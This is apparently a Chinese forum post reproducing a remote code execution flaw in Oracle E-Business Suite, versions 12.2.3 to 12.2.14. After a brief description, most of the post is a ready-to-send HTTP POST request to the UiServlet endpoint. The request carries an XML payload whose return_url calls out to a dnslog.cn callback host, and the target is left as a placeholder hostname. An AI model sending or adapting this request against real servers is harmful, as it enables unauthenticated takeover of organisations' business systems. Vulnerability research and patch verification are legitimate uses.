Oracle E-Business Suite远程代码执行 漏洞复现

admin

漏洞存在于客户Oracle E-Business  Suite中的Oracle并行处理产品（组件：BI  Publisher集成）存在漏洞。受影响的支持版本为12.2.3-12.2.14。该漏洞易于利用，允许未经身份验证的攻击者通过HTTP进行网络访问，从而危及Oracle并行处理。成功利用此漏洞可导致Oracle并行处理被接管。




资产确定：

游客，如果您要查看本帖隐藏内容请回复

POST /OA_HTML/configurator/UiServlet HTTP/1.1
Host: {{hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 221


redirectFromJsp=1&getUiType=<?xml version="1.0" encoding="UTF-8"?>
<initialize>
  <param name="init_was_saved">test</param>
  <param name="return_url">http://er30s4.dnslog.cn</param>
  <param name="ui_def_id">0</param>
  <param name="config_effective_usage_id">0</param>
  <param name="ui_type">Applet</param>
</initialize>